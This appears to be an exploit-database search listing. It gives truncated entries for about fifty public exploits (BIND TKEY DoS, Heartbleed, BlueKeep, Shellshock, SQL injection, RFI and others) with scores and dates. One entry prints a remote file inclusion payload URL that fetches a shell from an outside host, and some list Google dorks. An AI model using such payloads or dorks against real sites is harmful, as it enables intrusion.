Lucene search
K
ExploitpackMost viewed

41207 matches found

exploitpack
exploitpack
added 2015/08/05 12:0 a.m.126 views

ISC BIND 9 - TKEY Remote Denial of Service (PoC)

ISC BIND 9 - TKEY Remote Denial of Service PoC !/usr/bin/env python Exploit Title: PoC for BIND9 TKEY DoS Exploit Author: elceef Software Link: https://github.com/elceef/tkeypoc/ Version: ISC BIND 9 Tested on: multiple CVE : CVE-2015-5477 import socket import sys print'CVE-2015-5477 BIND9 TKEY Po...

7.8CVSS0.2AI score0.91284EPSS
Exploits12
exploitpack
exploitpack
added 2015/02/23 12:0 a.m.126 views

PHP DateTime - Use-After-Free

PHP DateTime - Use-After-Free Use After Free Vulnerability in unserialize with DateTime CVE-2015-0273 Taoguang Chen - Write Date: 2015.1.29 - Release Date: 2015.2.20 A use-after-free vulnerability was discovered in unserialize with DateTime/DateTimeZone/DateInterval/DatePeriod objects's wakeup...

7.5CVSS7.4AI score0.41315EPSS
Exploits9
exploitpack
exploitpack
added 2008/11/02 12:0 a.m.126 views

Maran PHP Shop - prod.php SQL Injection

Maran PHP Shop - prod.php SQL Injection Maran PHP Shop prod.php cat SQL Injection Vulnerability url: http://www.maran.pamil-visions.com/maranshop.php Author: JosS mail: sys-projectathotmaildotcom site: http://spanish-hackers.com team: Spanish Hackers Team - SHT This was written for educational...

0.7AI score
Exploits0
exploitpack
exploitpack
added 2007/03/07 12:0 a.m.126 views

PHP-Nuke Module PostGuestbook 0.6.1 - tpl_pgb_moddir Remote File Inclusion

PHP-Nuke Module PostGuestbook 0.6.1 - tplpgbmoddir Remote File Inclusion PostGuestbook 0.6.1tplpgbmoddirRemote File Include Expliot D.Script: http://sourceforge.net/projects/postguestbook/ Dork: "Powered by: PostGuestbook 0.6.1" Discovered by GloDM = Mahmoodali Homepage: http://www.Tryag.cc Greet...

7.5AI score
Exploits0
exploitpack
exploitpack
added 2020/03/17 12:0 a.m.125 views

Microsoft VSCode Python Extension - Code Execution

Microsoft VSCode Python Extension - Code Execution VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folder...

0.4AI score
Exploits0
exploitpack
exploitpack
added 2020/01/13 12:0 a.m.125 views

Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)

Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC Remote Code Execution', 'Description' = %q ...

7.5CVSS0.8AI score0.99999EPSS
Exploits48
exploitpack
exploitpack
added 2020/01/08 12:0 a.m.125 views

Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape

Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Date: 2020-01-07 Exploit Author: Harrison Neal, PatchAdvisor Vendor Homepage: https://tomcat.apache.org/ Software Link:...

5CVSS0.3AI score0.10303EPSS
Exploits5
exploitpack
exploitpack
added 2019/11/19 12:0 a.m.125 views

Microsoft Windows 7 (x86) - BlueKeep Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free

Microsoft Windows 7 x86 - BlueKeep Remote Desktop Protocol RDP Remote Windows Kernel Use After Free EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload...

7.5AI score
Exploits0
exploitpack
exploitpack
added 2018/08/27 12:0 a.m.125 views

LiteCart 2.1.2 - Arbitrary File Upload

LiteCart 2.1.2 - Arbitrary File Upload Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload Date: 2018-08-27 Exploit Author: Haboob Team Software Link: https://www.litecart.net/downloading?version=2.1.2 Version: 2.1.2 CVE : CVE-2018-12256 1. Description admin/vqmods.app/vqmods.inc.php in LiteCar...

6.5CVSS0.3AI score0.02599EPSS
Exploits4
exploitpack
exploitpack
added 2018/06/08 12:0 a.m.125 views

XiongMai uc-httpd 1.0.0 - Buffer Overflow

XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow Date: 2018-06-08 Exploit Author: Andrew Watson Software Version: XiongMai uc-httpd 1.0.0 Vendor Homepage: http://www.xiongmaitech.com/en/ Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on...

10CVSS0.3AI score0.40386EPSS
Exploits8
exploitpack
exploitpack
added 2017/01/02 12:0 a.m.125 views

PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution

PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution !/usr/bin/python intro = """\03394m / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // PHPMailer /...

7.5CVSS0.1AI score0.99714EPSS
Exploits71
exploitpack
exploitpack
added 2020/03/23 12:0 a.m.124 views

rConfig 3.9.4 - search.crud.php Remote Command Injection

rConfig 3.9.4 - search.crud.php Remote Command Injection Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link:...

10AI score0.83862EPSS
Exploits3
exploitpack
exploitpack
added 2020/03/18 12:0 a.m.124 views

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

Microtik SSH Daemon 6.44.3 - Denial of Service PoC Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: ...

7.3AI score
Exploits0
exploitpack
exploitpack
added 2019/01/28 12:0 a.m.124 views

Cisco RV300 RV320 - Information Disclosure

Cisco RV300 RV320 - Information Disclosure Exploit Title: 6coRV Exploit Date: 01-26-2018 Exploit Author: Harom Ramos Horus Tested on: Cisco RV300/RV320 CVE : CVE-2019-1653 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from fakeuseragent import UserAgent d...

5CVSS6.6AI score0.99876EPSS
Exploits19
exploitpack
exploitpack
added 2019/01/14 12:0 a.m.124 views

xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation

xorg-x11-server 1.20.3 Solaris 11 - inittab Local Privilege Escalation !/bin/sh Exploit Title: xorg-x11-server A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the...

7.2CVSS0.3AI score0.2704EPSS
Exploits39
exploitpack
exploitpack
added 2019/01/04 12:0 a.m.124 views

Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (polkit Method)

Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation polkit Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses polkit technique ---...

4.4CVSS0.5AI score0.07611EPSS
Exploits24
exploitpack
exploitpack
added 2018/02/20 12:0 a.m.124 views

μTorrent (uTorrent) ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure

μTorrent uTorrent ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure By default, utorrent create an HTTP RPC server on port 10000 uTorrent classic or 19575 uTorrent web. There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest. T...

Exploits0
exploitpack
exploitpack
added 2010/05/18 12:0 a.m.124 views

Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting

Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting source: https://www.securityfocus.com/bid/40230/info The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2008/11/15 12:0 a.m.124 views

ClipShare Pro 2006-2007 - chid SQL Injection

ClipShare Pro 2006-2007 - chid SQL Injection ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE...

0.7AI score
Exploits0
exploitpack
exploitpack
added 2020/03/24 12:0 a.m.123 views

Veyon 4.3.4 - VeyonService Unquoted Service Path

Veyon 4.3.4 - VeyonService Unquoted Service Path Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path Discovery by: Víctor García Discovery Date: 2020-03-23 Vendor Homepage: https://veyon.io/ Software Link:...

0.3AI score
Exploits0
exploitpack
exploitpack
added 2020/03/16 12:0 a.m.123 views

PHPKB Multi-Language 9 - Authenticated Directory Traversal

PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...

4CVSS5.2AI score0.07844EPSS
Exploits5
exploitpack
exploitpack
added 2018/08/28 12:0 a.m.123 views

VirtualBox 5.2.6.r120293 - VM Escape

VirtualBox 5.2.6.r120293 - VM Escape Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration VBVA feature affecting Linux hosts. VBVA feature works o...

4.6CVSS7AI score0.01058EPSS
Exploits3
exploitpack
exploitpack
added 2019/11/14 12:0 a.m.122 views

Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation

Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation EDB Note Download: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip COMahawk...

7.2CVSS0.4AI score0.2995EPSS
Exploits25
exploitpack
exploitpack
added 2020/03/12 12:0 a.m.121 views

rConfig 3.9 - searchColumn SQL Injection

rConfig 3.9 - searchColumn SQL Injection Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see al...

7.5CVSS9.7AI score0.99683EPSS
Exploits14
exploitpack
exploitpack
added 2015/10/17 12:0 a.m.121 views

ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - .asx Local Stack Overflow

ASX to MP3 Converter 1.82.50 Windows 2003 x86 - .asx Local Stack Overflow / ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team holahola https://www.exploit-db.com/exploits/38382/ Winblows 2k3 / include include include int main int i; char overwriteoffset =...

0.5AI score
Exploits0
exploitpack
exploitpack
added 2014/09/25 12:0 a.m.121 views

GNU Bash - Environment Variable Command Injection (Metasploit)

GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...

10CVSS1.4AI score0.99999EPSS
Exploits130
exploitpack
exploitpack
added 2020/03/16 12:0 a.m.120 views

PHPKB Multi-Language 9 - Authenticated Remote Code Execution

PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...

6.5CVSS0.2AI score0.04884EPSS
Exploits5
exploitpack
exploitpack
added 2020/03/12 12:0 a.m.120 views

Joomla! Component com_newsfeeds 1.0 - feedid SQL Injection

Joomla! Component comnewsfeeds 1.0 - feedid SQL Injection Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork:...

0.3AI score
Exploits0
exploitpack
exploitpack
added 2020/01/22 12:0 a.m.120 views

Ricoh Printer Drivers - Local Privilege Escalation

Ricoh Printer Drivers - Local Privilege Escalation / This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded CVE-2019-19363. Written by Pentagrid AG, 2019. Cf...

4.6CVSS0.9AI score0.04566EPSS
Exploits8
exploitpack
exploitpack
added 2016/12/23 12:0 a.m.120 views

OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation

OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled config option UsePrivilegeSeparation=no. While privilege separatio...

0.7AI score
Exploits0
exploitpack
exploitpack
added 2003/06/06 12:0 a.m.120 views

Zentrack 2.22.32.4 - index.php Remote File Inclusion

Zentrack 2.22.32.4 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote...

7.5AI score
Exploits0
exploitpack
exploitpack
added 2020/03/11 12:0 a.m.119 views

Wordpress Plugin Search Meter 2.13.2 - CSV injection

Wordpress Plugin Search Meter 2.13.2 - CSV injection Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link:...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2014/10/27 12:0 a.m.119 views

Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash

Binary File Descriptor Library libbfd - Out-of-Bounds Crash Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is tha...

10CVSS0.2AI score0.64326EPSS
Exploits16
exploitpack
exploitpack
added 2014/04/08 12:0 a.m.119 views

OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure

OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure !/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re...

5CVSS8.2AI score0.99999EPSS
Exploits87
exploitpack
exploitpack
added 2006/09/15 12:0 a.m.119 views

Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion

Coppermine Photo Gallery 1.2.2b Nuke Addon - Remote File Inclusion ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Coppermine Photo Gallery v1.2.2b for...

0.4AI score
Exploits0
exploitpack
exploitpack
added 2020/03/16 12:0 a.m.118 views

Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)

Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link:...

7.5CVSS1AI score0.14209EPSS
Exploits5
exploitpack
exploitpack
added 2016/04/27 12:0 a.m.118 views

RomPager 4.34 (Multiple Router Vendors) - Misfortune Cookie Authentication Bypass

RomPager 4.34 Multiple Router Vendors - Misfortune Cookie Authentication Bypass Title: Misfortune Cookie Exploit RomPager = 4.34 router authentication remover Date: 17/4/2016 CVE: CVE-2015-9222 http://mis.fortunecook.ie Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... Vulnerable models...

10CVSS0.5AI score0.63748EPSS
Exploits12
exploitpack
exploitpack
added 2014/09/29 12:0 a.m.118 views

dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)

dhclient 4.1 - Bash Environment Variable Command Injection Shellshock !/usr/bin/python Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC Date: 2014-09-29 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1 Tested on: Debian, Ubuntu, Kali CVE: CVE-2014-6277,...

10CVSS0.9AI score0.9994EPSS
Exploits44
exploitpack
exploitpack
added 2006/08/09 12:0 a.m.118 views

Tagger Luxury Edition - BBCodeFile Remote File Inclusion

Tagger Luxury Edition - BBCodeFile Remote File Inclusion Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dor...

0.6AI score
Exploits0
exploitpack
exploitpack
added 2003/02/19 12:0 a.m.118 views

cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)

cPanel 5.0 - Guestbook.cgi Remote Command Execution 4 source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cg...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2020/03/13 12:0 a.m.117 views

AnyBurn 4.8 - Buffer Overflow (SEH)

AnyBurn 4.8 - Buffer Overflow SEH Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterpri...

0.7AI score
Exploits0
exploitpack
exploitpack
added 2020/03/12 12:0 a.m.117 views

HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)

HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8...

0.2AI score
Exploits0
exploitpack
exploitpack
added 2019/10/31 12:0 a.m.117 views

MikroTik RouterOS 6.45.6 - DNS Cache Poisoning

MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Date: 2019-10-30 Exploit Author: Jacob Baines Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download Version: 6.45.6 Stable and below or 6.44.5 Long-term and...

7.5CVSS0.10274EPSS
Exploits5
exploitpack
exploitpack
added 2013/11/18 12:0 a.m.117 views

Dahua DVR 2.608.0000.02.608.GV00.0 - Authentication Bypass (Metasploit)

Dahua DVR 2.608.0000.02.608.GV00.0 - Authentication Bypass Metasploit Dahua DVR Authentication Bypass - CVE-2013-6117 --Summary-- Dahua web-enabled DVRs and rebranded versions do not enforce authentication on their administrative services. Zhejiang Dahua Technology Co., Ltd...

10CVSS0.5AI score0.70713EPSS
Exploits6
exploitpack
exploitpack
added 2019/12/04 12:0 a.m.116 views

Microsoft Visual Basic 2010 Express - XML External Entity Injection

Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Author: ZwX Exploit Date: 2019-12-03 Version Software : 10.0.30319.1 RTMRel Vendor Homepage : https://www.microsoft.com/ Software Link:...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2019/08/15 12:0 a.m.116 views

Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream

Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 2040.5034: Access violation - code c0000005 first...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2019/01/25 12:0 a.m.116 views

Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection

Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details ======= Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected...

9CVSS0.4AI score0.95923EPSS
Exploits11
exploitpack
exploitpack
added 2017/05/11 12:0 a.m.116 views

Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation

Linux Kernel 4.8.0-41-generic Ubuntu - Packet Socket Local Privilege Escalation // A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // //...

7.2CVSS0.7AI score0.17827EPSS
Exploits17
exploitpack
exploitpack
added 2019/04/08 12:0 a.m.115 views

QNAP Netatalk 3.1.12 - Authentication Bypass

QNAP Netatalk 3.1.12 - Authentication Bypass Exploit Title: QNAP Netatalk Authentication Bypass Date: 12/20/2018 Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link:...

10CVSS0.4AI score0.86539EPSS
Exploits10
exploitpack
exploitpack
added 2019/02/13 12:0 a.m.115 views

snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (2)

snapd 2.37 Ubuntu - dirtysock Local Privilege Escalation 2 !/usr/bin/env python3 """ dirtysock: Privilege Escalation in Ubuntu via snapd In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository...

0.5AI score
Exploits0
Total number of security vulnerabilities5000